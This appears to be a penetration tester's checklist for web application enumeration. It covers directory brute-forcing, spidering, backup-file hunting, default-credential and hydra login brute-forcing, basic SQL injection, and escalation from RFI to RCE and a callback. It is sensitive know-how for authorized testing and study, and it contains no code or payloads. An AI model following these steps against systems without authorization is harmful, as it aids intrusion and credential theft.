Web Path
Methodology summary
Launch general purposes scanners (gobuster, dirsearch etc).
With the scans running, look at the source, network connections, cookies, robots.txt, sitemap, 404/403 error, and SSL/TLS scan.
Start spidering with Burp Suite.
When you identify a directory, also brute force that
Backups checking: Test if you can find backups of discovered files appending common backup extensions.
Brute-Force parameters: Try to find hidden parameters.
Once you have identified all the possible endpoints accepting user input, check for all kind of vulnerabilities related to it.
Basic Enumeration
Find the index page
Check wappalyzer in order to see what the page was built with
What is the version of the web server running
Paths
Enumerate the url paths to see if anything is hidden, and to map the site
Check
robots.txt
See if
php
files are taking parameters like10.11.1.16/administrator/alerts/alertConfigField.php?urlConfig=
Is there a login form?
If its
phpmyadmin
or another applicationTry default creds
Try basic
SQL-i
Is it user generated content?
Is there a username?
If there is use hydra and try to brute the login
Try basic
SQL-i
Vulnerabilities
Run
nikto
Exploit-db and look for vulnerabilities for the CMS or application running as well as the core version of the web server running
Can you get RFI?
Can you now get RCE via RFI?
Now can you get a true call back?
Last updated